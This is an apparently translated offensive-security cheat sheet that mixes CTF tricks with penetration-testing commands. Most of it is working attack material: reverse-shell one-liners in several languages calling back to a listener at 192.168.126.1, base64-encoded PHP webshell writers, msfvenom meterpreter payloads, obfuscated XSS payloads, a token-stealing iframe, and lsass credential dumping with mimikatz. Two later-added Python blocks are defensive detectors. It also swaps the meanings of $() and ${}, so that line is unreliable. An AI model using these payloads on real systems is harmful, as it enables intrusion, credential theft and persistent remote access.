Cheat Sheet

CTF

Workflow

1. View the page source
2. Check robots.txt

Space bypass on Linux

cat flag.txt
cat${IFS}flag.txt
cat$IFS$9flag.txt
cat<flag.txt

${IFS}
Shell scripts have a variable called IFS (Internal Field Separator). Its full definition: The shell uses the value stored in IFS, which is the space, tab, and newline characters by default, to delimit words for the read and set commands, when parsing output from command substitution, and when performing variable substitution.
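As an added defensive example (not part of the original page), the following Python rewrites the IFS-based space substitutes listed above back to literal spaces so that command-injection signatures written against the plain form still match; the sample command strings are constructed for this example.

```python
import re

# Constructed command strings as they might appear in a web-server access log
# or a captured command-injection parameter (sample input, not from the page).
SAMPLE_COMMANDS = [
    "cat flag.txt",
    "cat${IFS}flag.txt",
    "cat$IFS$9flag.txt",
    "cat<flag.txt",
    "ls${IFS}-la${IFS}/var/www",
    "echo $IFS_COUNT",      # a different variable name; must not be touched
]

# Shell idioms that stand in for a literal space. ${IFS} and $IFS expand to
# the default IFS characters (space, tab, newline); in "$IFS$9" the unset
# positional parameter $9 only terminates the variable name, so the shell
# does not look up a variable called IFSflag.
IFS_PATTERNS = [
    re.compile(r"\$\{IFS\}"),
    re.compile(r"\$IFS\$[0-9]"),
    re.compile(r"\$IFS(?![A-Za-z0-9_])"),
]
# "cmd<file" hands the file to cmd on stdin, avoiding the space entirely.
STDIN_REDIRECT = re.compile(r"(?<=\S)<(?=[^\s<>&])")


def uses_ifs_bypass(cmd: str) -> bool:
    """True when the command hides whitespace behind the IFS variable."""
    return any(p.search(cmd) for p in IFS_PATTERNS)


def normalize_command(cmd: str) -> str:
    """Rewrite IFS substitutes to a plain space and mark the '<file' trick
    so that a signature written for 'cat flag.txt' still matches."""
    out = cmd
    for pat in IFS_PATTERNS:
        out = pat.sub(" ", out)
    return STDIN_REDIRECT.sub(" <", out)


def flag_commands(cmds):
    """Return (original, normalized) pairs for every command using the bypass."""
    return [(c, normalize_command(c)) for c in cmds if uses_ifs_bypass(c)]
```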

PHP is_numeric bypass

Bypass using hexadecimal

PHP assert()

Execute multiple commands

<?php
assert(print('Hello') and print(' ') and print('world'))
?>

outguess

outguess -r picture text

Linux

Spawn a shell from Python

python -c 'import pty;pty.spawn("/bin/sh")'
python -c 'import pty;pty.spawn("/bin/bash")'

Allow root login over ssh

vim /etc/ssh/sshd_config
PasswordAuthentication yes
PermitRootLogin yes

Start the ssh service at boot

update-rc.d ssh enable

bash_history

Copy and paste

Copy: Ctrl + Shift + C
Paste: Ctrl + Shift + V
Copy: Ctrl|Shift + Insert | select with the mouse
Paste: Ctrl|Shift + Insert | click the mouse wheel

After selecting with Ctrl + mouse, pasting executes immediately

$() and ${}

$() is variable substitution
${} is command substitution

Add a user

useradd -d "/home/chessur" -m -s "/bin/bash" chessur
# -d specifies the home directory
# -m creates the home directory if it does not exist
# -s specifies the login shell

ufw

ufw default deny   # deny all ports by default
ufw status         # show ufw status
ufw allow port     # allow a port
ufw enable         # enable ufw

Single-user mode

At boot choose Advanced options, press e, find "ro recovery nomodeset" and change it to "rw single init=/bin/bash", then press F10 or Ctrl+X to boot into single-user mode

Show output base64-encoded

cat index.php | base64

firewall

firewall-cmd --zone=public --add-port=80/tcp --permanent
systemctl stop firewalld
systemctl start firewalld
firewall-cmd --reload

Vim

Change tab to four spaces

vim /etc/vimrc

set ts=4
set expandtab
set autoindent

MySQL

Change secure_file_priv

There is no my.ini and my.cnf is empty; MySQL version 5.7.26

vim /etc/mysql/my.cnf
[mysqld]
secure_file_priv=''

Reference:
can't set secure_file_priv on mysql 5.7 Ubuntu 16.04

Versions

5.0 added information_schema

4.0 supports union

Reverse shell

Bash

bash -i >& /dev/tcp/192.168.126.1/6666 0>&1
bash -i 5<>/dev/tcp/192.168.126.1/6666 0>&5 1>&5

PERL

perl -e 'use Socket;$i="192.168.126.1";$p=6666;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.126.1",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

php -r '$sock=fsockopen("192.168.126.1",6666);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby

ruby -rsocket -e'f=TCPSocket.open("192.168.126.1",6666).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat

nc -e /bin/sh 192.168.126.1 6666

Other

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.126.1 6666 >/tmp/f

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.126.1/6666;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

<?PHP fputs(fopen('windy.php','w'),'<?php eval($_POST[windy])?>');?>

Reverse shell via image

Tool: https://github.com/peewpw/Invoke-PSImage

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.126.1 LPORT=6666 -f psh-reflection -o /root/image_shell.ps1

Kali

weevely

weevely generate Windy /root/windy.php
weevely terminal http://target.com/windy.php Windy

Set a static IP in bridged mode

1. Select the network adapter in VMware
2. Edit the configuration file

vim /etc/network/interfaces
auto eth0
#
iface eth0 inet static
address 192.168.126.126
netmask 255.255.255.0
gateway 192.168.126.1
broadcast 192.168.126.255
dns-nameservers 114.114.114.114

XSS

payload

javascrip&#x0000000074:alert(1)
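An added example, not from the original page: a Python check that decodes an href the way a browser does before comparing the scheme (html.unescape follows the HTML5 rules, so the zero-padded entity without a trailing semicolon above decodes to "t"), which is why a filter that only matches the literal string "javascript:" is insufficient; the sample hrefs are constructed.

```python
import html
import re

# Constructed href values of the kind an attribute filter might receive
# (sample input for this example, not taken from the original page).
SAMPLE_HREFS = [
    "javascript:alert(1)",                 # literal scheme
    "javascrip&#x0000000074:alert(1)",     # zero-padded hex entity, no ';'
    "&#106;avascript:alert(1)",            # decimal entity for 'j'
    "java\x00script:alert(1)",             # raw NUL inside the scheme
    "  jav\tascript:alert(1)",             # leading spaces and a tab
    "https://example.com/index.php",       # benign
    "/relative/path",                      # benign, no scheme
]

DANGEROUS_SCHEMES = {"javascript", "vbscript", "data"}


def normalize_href(value: str) -> str:
    """Decode an href the way a browser will before the scheme is compared.

    html.unescape applies the HTML5 character-reference rules, so numeric
    references with leading zeros or without a trailing ';' are decoded.
    ASCII control characters (including NUL, tab and newline) are then
    dropped and surrounding whitespace trimmed, since browsers ignore
    them when parsing the scheme.
    """
    decoded = html.unescape(value)
    decoded = "".join(ch for ch in decoded if ord(ch) >= 0x20)
    return decoded.strip()


def extract_scheme(url: str) -> str:
    """Return the lower-cased URL scheme, or '' if there is none."""
    m = re.match(r"^([a-zA-Z][a-zA-Z0-9+.-]*):", url)
    return m.group(1).lower() if m else ""


def is_dangerous_href(value: str) -> bool:
    """True when the decoded href would execute script or inline data."""
    return extract_scheme(normalize_href(value)) in DANGEROUS_SCHEMES


def flagged_hrefs(values):
    """Return (raw, decoded) pairs for every href resolving to a dangerous scheme."""
    return [(v, normalize_href(v)) for v in values if is_dangerous_href(v)]
```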

&#x0000 null byte

<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.__$+")"+"\"")())()</script>

URL encoding

%3C%73%63%72%69%70%74%3E%24%3D%7E%5B%5D%3B%24%3D%7B%5F%5F%5F%3A%2B%2B%24%2C%24%24%24%24%3A%28%21%5B%5D%2B%22%22%29%5B%24%5D%2C%5F%5F%24%3A%2B%2B%24%2C%24%5F%24%5F%3A%28%21%5B%5D%2B%22%22%29%5B%24%5D%2C%5F%24%5F%3A%2B%2B%24%2C%24%5F%24%24%3A%28%7B%7D%2B%22%22%29%5B%24%5D%2C%24%24%5F%24%3A%28%24%5B%24%5D%2B%22%22%29%5B%24%5D%2C%5F%24%24%3A%2B%2B%24%2C%24%24%24%5F%3A%28%21%22%22%2B%22%22%29%5B%24%5D%2C%24%5F%5F%3A%2B%2B%24%2C%24%5F%24%3A%2B%2B%24%2C%24%24%5F%5F%3A%28%7B%7D%2B%22%22%29%5B%24%5D%2C%24%24%5F%3A%2B%2B%24%2C%24%24%24%3A%2B%2B%24%2C%24%5F%5F%5F%3A%2B%2B%24%2C%24%5F%5F%24%3A%2B%2B%24%7D%3B%24%2E%24%5F%3D%28%24%2E%24%5F%3D%24%2B%22%22%29%5B%24%2E%24%5F%24%5D%2B%28%24%2E%5F%24%3D%24%2E%24%5F%5B%24%2E%5F%5F%24%5D%29%2B%28%24%2E%24%24%3D%28%24%2E%24%2B%22%22%29%5B%24%2E%5F%5F%24%5D%29%2B%28%28%21%24%29%2B%22%22%29%5B%24%2E%5F%24%24%5D%2B%28%24%2E%5F%5F%3D%24%2E%24%5F%5B%24%2E%24%24%5F%5D%29%2B%28%24%2E%24%3D%28%21%22%22%2B%22%22%29%5B%24%2E%5F%5F%24%5D%29%2B%28%24%2E%5F%3D%28%21%22%22%2B%22%22%29%5B%24%2E%5F%24%5F%5D%29%2B%24%2E%24%5F%5B%24%2E%24%5F%24%5D%2B%24%2E%5F%5F%2B%24%2E%5F%24%2B%24%2E%24%3B%24%2E%24%24%3D%24%2E%24%2B%28%21%22%22%2B%22%22%29%5B%24%2E%5F%24%24%5D%2B%24%2E%5F%5F%2B%24%2E%5F%2B%24%2E%24%2B%24%2E%24%24%3B%24%2E%24%3D%28%24%2E%5F%5F%5F%29%5B%24%2E%24%5F%5D%5B%24%2E%24%5F%5D%3B%24%2E%24%28%24%2E%24%28%24%2E%24%24%2B%22%5C%22%22%2B%24%2E%24%5F%24%5F%2B%28%21%5B%5D%2B%22%22%29%5B%24%2E%5F%24%5F%5D%2B%24%2E%24%24%24%5F%2B%22%5C%5C%22%2B%24%2E%5F%5F%24%2B%24%2E%24%24%5F%2B%24%2E%5F%24%5F%2B%24%2E%5F%5F%2B%22%28%22%2B%24%2E%5F%5F%24%2B%22%29%22%2B%22%5C%22%22%29%28%29%29%28%29%3C%2F%73%63%72%69%70%74%3E

<script>eval('
\x76\x61\x72\40\141\75String.fromCharCode(49);\u0061\u006c\u0065\u0072\u0074\u0028a\u0029;
')</script>

<script>eval('
\x76\x61\x72\40\141\75String.fromCharCode(%34%39);\u0061\u006c\u0065\u0072\u0074\u0028a\u0029;
')</script>

<script>eval('
\x76\x61\x72\40\141\75%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%34%39%29%3b\u0061\u006c\u0065\u0072\u0074\u0028a\u0029;
')</script>

Get the user_token

<iframe src="../csrf"onload=alert(frames[0].document.getElementsByName('user_token')[0].value)>

PHP

Pseudo-protocols

Write a one-line shell

<?php echo `echo PD9waHAgQGV2YWwoJF9QT1NUWydXaW5keSddKT8+|base64 -d > upload/1.php` ;?>
<?php fputs(fopen('./Windy.php','w'),base64_decode('PD9waHAgZXZhbCgkX1BPU1RbV2luZHldKTs/Pg=='));?>

One-liner that writes an upload shell

?a=fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(base64_decode(UEQ5d2FIQWdEUXBBSkhSbGJYQWdQU0FrWDBaSlRFVlRXeWQxY0d4dllXUmZabWxzWlNkZFd5ZDBiWEJmYm1GdFpTZGRPdzBLUUNSbWFXeGxJRDBnWW1GelpXNWhiV1VvSkY5R1NVeEZVMXNuZFhCc2IyRmtYMlpwYkdVblhWc25ibUZ0WlNkZEtUc05DbWxtSUNobGJYQjBlU0FvSkdacGJHVXBLWHNOQ21WamFHOGdJanhtYjNKdElHRmpkR2x2YmlBOUlDY25JRzFsZEdodlpDQTlJQ2RRVDFOVUp5QkZUa05VV1ZCRlBTZHRkV3gwYVhCaGNuUXZabTl5YlMxa1lYUmhKejVjYmlJN1pXTm9ieUFpVEc5allXd2dabWxzWlRvZ1BHbHVjSFYwSUhSNWNHVWdQU0FuWm1sc1pTY2dibUZ0WlNBOUlDZDFjR3h2WVdSZlptbHNaU2MrWEc0aU8yVmphRzhnSWp4cGJuQjFkQ0IwZVhCbElEMGdKM04xWW0xcGRDY2dkbUZzZFdVZ1BTQW5WWEJzYjJGa0p6NWNiaUk3WldOb2J5QWlQQzltYjNKdFBseHVQSEJ5WlQ1Y2JseHVQQzl3Y21VK0lqdDlaV3h6WlNCN2FXWW9iVzkyWlY5MWNHeHZZV1JsWkY5bWFXeGxLQ1IwWlcxd0xDUm1hV3hsS1NsN1pXTm9ieUFpUm1sc1pTQjFjR3h2WVdSbFpDQnpkV05qWlhOelpuVnNiSGt1UEhBK1hHNGlPMzFsYkhObElIdGxZMmh2SUNKVmJtRmliR1VnZEc4Z2RYQnNiMkZrSUNJZ0xpQWtabWxzWlNBdUlDSXVQSEErWEc0aU8zMTlQejQ9)));
<?php
@$temp = $_FILES['upload_file']['tmp_name'];
@$file = basename($_FILES['upload_file']['name']);
if (empty($file)) {
    echo "<form action = '' method = 'POST' ENCTYPE='multipart/form-data'>\n";
    echo "Local file: <input type = 'file' name = 'upload_file'>\n";
    echo "<input type = 'submit' value = 'Upload'>\n";
    echo "</form>\n<pre>\n\n</pre>";
} else {
    if (move_uploaded_file($temp, $file)) {
        echo "File uploaded successfully.<p>\n";
    } else {
        echo "Unable to upload " . $file . ".<p>\n";
    }
}
?>

Halting the parser

<style>body{font-size: 0;} h1{font-size: 12px !important;}</style><h1><?php echo "<hr />THIS IMAGE COULD ERASE YOUR WWW ACCOUNT, it shows you the PHP info instead...<hr />"; eval($_POST[Windy]); __halt_compiler(); ?></h1>

MSF

Run a command to get a reverse shell; supports PHP and Python

use exploit/multi/script/web_delivery
set payload php/meterpreter/reverse_tcp

Generate a PHP reverse shell

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.126.126 lport=126 -f raw -o reverse_shell.php
use exploit/multi/handler

Add a route (inside meterpreter)

run autoroute -s 192.168.126.0/24

Scan for live hosts

use auxiliary/scanner/discovery/arp_sweep

SOCKS proxy

use auxiliary/server/socks4a
use auxiliary/server/socks5

msfvenom

-e encoder
-i number of encoding iterations
-a architecture, e.g. -a x86
--platform target platform, e.g. --platform win

msfvenom auto-completion

1. Install zsh
2. Create ~/.oh-my-zsh/custom/plugins/msfvenom
3. Put the script in that directory
4. Edit the zsh configuration file

vim ~/.zshrc
plugins=(msfvenom)

5. Reload zsh: source ~/.zshrc

Upgrade a command shell to a meterpreter shell

Ctrl + Z
y
sessions -u ID

MySQL

Import a database from the command line

mysql -uroot -pPassword databasename < filedir

Getting a shell from the admin backend

Modify template code

Change the allowed upload image formats

If uploaded templates are extracted automatically, upload a zip archive

WebShell

WebShell privileges

A webshell's privileges are generally determined by the privileges of the web container that parses and executes it.
On Linux, if the operating system has been hardened and you can upload files and run system commands but cannot obtain a shell, that means directory-permission hardening was done, but middleware hardening was not (uploads still work) and operating-system hardening was not done.
Directory hardening grants read and execute permission but not write.

Windows privilege escalation

PowerShell privilege escalation

Downloading files from cmd

1. Create downfile.vbs to download the file

echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2  >> downfile.vbs
cscript downfile.vbs http://192.168.40.13:9090/fileLibrary/5d5X9mSTZXjH9VlhXNN/x.txt D:\\tomcat8.5\\webapps\\x.jsp

2. Use the bitsadmin command

bitsadmin /transfer n http://www.xx.com/code.jpg c:\users\sdyp\desktop\ff.jpg

PR privilege escalation

Add a user:
pr.exe "net user chessur 123.com /add"
Add the user to the administrators group:
pr.exe "net localgroup chessur /add"

Glossary

Phishing attack

Watering-hole attack

A computer intrusion technique whose targets are usually a specific group (an organization, industry, region, etc.). The attacker first determines, by guessing or observation, which websites this group visits frequently, compromises one or more of them and plants malware, ultimately infecting some members of the target group.

Information gathering

Employee information

Social network
Blogs
Salary bank accounts

Software used by the company
Business partners
Sales bank accounts
Job openings

JavaScript encoding

var code = '\u003c'
code

Dumping hashes

procdump

A Windows-provided dump tool that antivirus does not kill

procdump.exe -accepteula -ma lsass.exe lsass.dmp

ProcDump v9.0

Then inspect it with mimikatz

sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords full

Tested on Win10 Build 17763: mimikatz could not read the dump
Works on WinXP

Scheduled tasks

Windows

at

Vim

Block selection: Ctrl+V

Set Tab to four spaces

vim /etc/vim/vimrc
set ts=4
set expandtab

For an already-saved file, the following commands convert between spaces and tabs

Tabs to spaces

:set ts=4
:set expandtab
:%retab!

Spaces to tabs

:set ts=4
:set noexpandtab
:%retab!

git

Add a setting

git config --global http.proxy IP:port

Remove a setting

git config --global --unset http.proxy

VS Code

PHP plugins

PHP Debug

Requirements:

XDebug must be configured

Purpose:

Enables PHP debugging

PHP IntelliSense

Requirements:

A PHP 7.0 or later binary on the PATH

Purpose:

Auto-completion

Shows the parameters a function takes

Jump to a function's definition

Find calls to a function